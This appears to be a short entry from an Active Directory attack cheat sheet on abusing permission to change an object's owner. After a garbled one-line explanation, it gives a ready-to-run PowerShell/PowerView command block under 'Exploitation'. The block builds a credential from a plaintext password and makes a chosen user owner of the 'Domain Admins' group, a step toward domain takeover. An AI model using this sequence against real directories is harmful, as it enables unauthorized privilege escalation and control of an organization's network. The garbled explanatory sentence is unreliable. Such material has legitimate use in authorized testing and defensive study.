This permission has the ability to modify the owner of the user, i.e, give the permission, which can then being used to modify object security descriptors, regardless of permissions on the object's DACL.
Exploitation
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)
# Set the ownership of the target object with PowerView
Set-DomainObjectOwner -Credential $Cred -TargetIdentity "Domain Admins" -OwnerIdentity harmj0y
